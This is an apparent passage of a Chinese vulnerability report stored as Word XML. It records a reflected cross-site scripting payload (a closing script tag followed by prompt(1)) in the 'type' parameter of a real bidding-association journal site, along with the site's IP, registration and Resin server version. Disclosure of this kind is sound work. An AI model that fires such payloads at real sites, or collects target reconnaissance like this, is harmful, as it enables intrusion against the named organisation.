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注入网址:http://zbcggl.ctba.org.cn/web/showlist?type=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;new</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:type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http://zbcggl.ctba.org.cn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站描述  "招标采购管理杂志" /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站标题  招标采购管理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  北京市 星缘新动力科技有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  122.49.0.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  13年6月6天（创建于2005年11月11日,过期时间为2020年11月11日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  京ICP备17043692号-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案性质  社会团体</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案名称  中国招标投标协会</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2017/7/31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Resin/4.0.40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http://zbcggl.ctba.org.cn/web/showlist?type=&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;new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bcggl.ctba.org.c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